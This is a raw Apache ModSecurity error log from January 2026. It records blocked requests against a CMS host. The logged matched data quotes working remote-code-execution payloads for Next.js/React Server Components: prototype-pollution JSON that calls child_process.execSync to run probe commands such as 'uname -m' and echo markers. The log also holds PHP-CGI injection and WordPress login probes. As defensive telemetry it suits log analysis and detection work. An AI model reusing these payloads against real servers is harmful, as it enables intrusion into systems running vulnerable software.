157.230.113.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\.fromcharcode\\\\b" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "238"] [id "958003"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: .fromcharcode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (promise.all([function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new promise((resolve, reject) => { try { var user..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aVcPq7KEyOlwJ7CBFsbLJwAAABA"] [Sat Jan 03 20:18:26.131151 2026] [:error] [pid 31981:tid 31996] [client 4.189.104.221:11241] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Jan 03 20:19:07.570441 2026] [:error] [pid 31981:tid 32007] [client 4.189.104.221:11074] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Tue Jan 06 03:43:27.079533 2026] [:error] [pid 22436:tid 22454] [client 167.172.169.77:56524] [client 167.172.169.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\.fromcharcode\\\\b" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "238"] [id "958003"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: .fromcharcode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (promise.all([function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new promise((resolve, reject) => { try { var user..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aVxovy7y87EOhpN_9Cm8lwAAAUM"] [Fri Jan 09 19:54:56.027358 2026] [:error] [pid 25446:tid 25449] [client 180.190.226.249:61031] [client 180.190.226.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aWFA8Pmeoo0gNMMwkamAVgAAAME"] [Sun Jan 11 07:11:59.980280 2026] [:error] [pid 2059:tid 2073] [client 20.196.88.31:10383] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Jan 22 17:56:27.569582 2026] [:error] [pid 23833:tid 23960] [client 95.111.227.74:50102] [client 95.111.227.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXJIq8o_-i6oc32FN_gRKAAAAJU"] [Thu Jan 22 17:56:27.648189 2026] [:error] [pid 23829:tid 23887] [client 95.111.227.74:50112] [client 95.111.227.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXJIq0h2OoOxFPIh5RHTCQAAAAI"] [Fri Jan 23 00:03:16.079092 2026] [:error] [pid 1410:tid 1444] [client 34.31.246.19:42636] [client 34.31.246.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\.fromcharcode\\\\b" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "238"] [id "958003"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: .fromcharcode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (promise.all([function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new promise((resolve, reject) => { try { var user..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXKepIDcjBV5xEDNqy0rlQAAA1A"] [Fri Jan 23 02:42:07.651056 2026] [:error] [pid 1269:tid 1292] [client 144.91.75.93:35222] [client 144.91.75.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD32GEvXZ9_gp7Z46MUQAAAow"] [Fri Jan 23 02:42:07.784572 2026] [:error] [pid 27498:tid 27510] [client 144.91.75.93:35224] [client 144.91.75.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD3yroIAtOpU7MrsuCRwAAAMQ"] [Fri Jan 23 02:42:38.775330 2026] [:error] [pid 27498:tid 27514] [client 124.222.77.202:55470] [client 124.222.77.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD_iroIAtOpU7MrsuCegAAAMg"] [Fri Jan 23 02:42:39.992461 2026] [:error] [pid 27498:tid 27509] [client 124.222.77.202:55472] [client 124.222.77.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD_yroIAtOpU7MrsuCfQAAAMM"] [Fri Jan 23 07:21:27.792992 2026] [:error] [pid 27839:tid 27853] [client 173.230.138.239:39860] [client 173.230.138.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXMFV7zFUg07V2GsFkeISAAAAMo"] [Fri Jan 23 07:21:28.200201 2026] [:error] [pid 27839:tid 27866] [client 173.230.138.239:39864] [client 173.230.138.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXMFWLzFUg07V2GsFkeISQAAANc"] [Tue Jan 27 00:55:57.763548 2026] [authz_core:error] [pid 17698:tid 17713] [client 165.227.84.14:39278] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Tue Jan 27 00:56:17.621720 2026] [:error] [pid 17853:tid 17930] [client 165.227.84.14:36308] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aXfxEdi4dsbxs1EKUYoEewAAApU"] [Tue Jan 27 00:58:55.417879 2026] [:error] [pid 17385:tid 17462] [client 176.65.148.161:46904] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXfxry72UvX9BTgPlmvOgwAAAI4"] [Tue Jan 27 02:18:12.681399 2026] [:error] [pid 17698:tid 17724] [client 176.65.148.161:37988] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXgERBZetwElHybpVf_W3gAAAlg"] [Tue Jan 27 05:44:44.827219 2026] [:error] [pid 16782:tid 16824] [client 176.65.148.161:51080] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXg0rCSgQB4Ct2kUuelJrAAAAcs"] [Wed Jan 28 01:59:08.645734 2026] [:error] [pid 17107:tid 17118] [client 85.11.167.4:52168] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769558381_7841',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769558381_784..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXlRTJDpGe_61de3kFkZZQAAAoY"], referer: https://cms.dev-unit.com [Wed Jan 28 01:59:08.720227 2026] [:error] [pid 17329:tid 17362] [client 85.11.167.4:52170] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769558381',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769558381',{'timeo..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXlRTAvUOYrhppVINxkpkgAAA0A"], referer: https://cms.dev-unit.com [Wed Jan 28 11:32:11.382075 2026] [:error] [pid 4182:tid 4194] [client 3.75.87.204:43936] [client 3.75.87.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aXnXm2wnF_IRb0FEEEXuaAAAAMo"] [Wed Jan 28 13:46:00.400870 2026] [:error] [pid 6774:tid 6811] [client 85.11.167.4:55894] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769600793_7870',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769600793_787..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXn2-FhOp7ZZChWKpwtDJgAAAUY"], referer: https://cms.dev-unit.com [Wed Jan 28 13:46:00.478962 2026] [:error] [pid 6774:tid 6841] [client 85.11.167.4:55896] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched 